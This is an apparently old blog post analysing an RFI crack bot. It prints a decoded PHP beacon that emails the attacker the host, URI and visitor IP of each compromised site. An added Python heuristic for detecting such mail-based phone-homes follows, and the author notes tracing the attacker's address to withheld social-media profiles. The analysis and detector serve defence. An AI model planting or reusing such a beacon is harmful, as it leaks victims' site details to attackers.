Irregular Expressions

Aug 27 2010   11:59AM GMT

Casper RFI crack bot – Part 8

Dan O'Connor

We have one more to decode, $shell_data:

$shell_data = "$visitcount = $HTTP_COOKIE_VARS["visits"];
if( $visitcount == "") {
     $visitcount = 0;
     $visitor = $_SERVER["REMOTE_ADDR"];
     $web = $_SERVER["HTTP_HOST"];
     $inj = $_SERVER["REQUEST_URI"];
     $target = rawurldecode($web.$inj);
     $body = "Boss, there was an injected target on $target by $visitor";
     @mail("xxxxxx@gmail.com","Fx29Shell http://$target by $visitor", "$body");
     } else {
     $visitcount;
     }
     setcookie("visits",$visitcount);"

Good to know it phones home.
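As an added example (not code from the original post), here is a small Python heuristic for spotting this kind of phone-home when reviewing PHP files on a compromised host: it traces `$_SERVER` request fields through simple assignments and reports any `mail()` call built from them. The function names and the benign sample are assumptions made for illustration.

```python
import re

# Request metadata the decoded beacon reports home (keys taken from the sample above).
SOURCES = re.compile(r'\$_SERVER\[\s*["\'](REMOTE_ADDR|HTTP_HOST|REQUEST_URI)["\']\s*\]')
ASSIGN = re.compile(r'\$(\w+)\s*=(?![=>])\s*(.*?);', re.S)  # heuristic: ends at first ';'
MAIL = re.compile(r'\bmail\s*\((.*?)\)\s*;', re.S)          # heuristic: ends at first ');'
VAR = re.compile(r'\$(\w+)')

def request_keys(expr, taint):
    """$_SERVER keys an expression uses directly or through tainted variables."""
    keys = set(SOURCES.findall(expr))
    for name in VAR.findall(expr):
        keys |= taint.get(name, set())
    return keys

def find_beacons(src):
    """Return (line, keys) for each mail() call whose arguments derive from request metadata."""
    assigns, taint, changed = ASSIGN.findall(src), {}, True
    while changed:  # propagate taint through assignments until nothing new is learned
        changed = False
        for name, expr in assigns:
            keys = request_keys(expr, taint)
            if not keys <= taint.get(name, set()):
                taint[name] = taint.get(name, set()) | keys
                changed = True
    return [(src.count('\n', 0, m.start()) + 1, sorted(keys))
            for m in MAIL.finditer(src)
            if (keys := request_keys(m.group(1), taint))]

# Core of the decoded beacon from the post (address already redacted there).
SAMPLE = r'''$visitor = $_SERVER["REMOTE_ADDR"];
$web = $_SERVER["HTTP_HOST"];
$inj = $_SERVER["REQUEST_URI"];
$target = rawurldecode($web.$inj);
$body = "Boss, there was an injected target on $target by $visitor";
@mail("xxxxxx@gmail.com","Fx29Shell http://$target by $visitor", "$body");'''

# Constructed benign call: static arguments only, so it must not be flagged.
BENIGN = 'mail("ops@example.invalid", "Nightly report", "Backup finished");'

if __name__ == "__main__":
    print(find_beacons(SAMPLE))   # the beacon's mail() call and the fields it leaks
    print(find_beacons(BENIGN))   # no findings
```

The tracking is flow-insensitive and regex-based, so treat a hit as a lead for manual review rather than a verdict.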

Well, there are a few more places that mention that address, and what’s really interesting is that this guy appears to have his account on Friendster.

http://profiles.friendster.com/xxxxxx

I am pretty certain that this is the guy, but it would not be nice to share this information. Kinda odd that he would use his real email address; maybe it’s an old one that he forgot was on Friendster and out on the internets.

Hmm, it also has another email address on his profile, and it has a Facebook account!

http://facebook.com/XXXXXXXX

Well, that's awesome, but what do you do with it?

(And there is a reason I did not post the links)
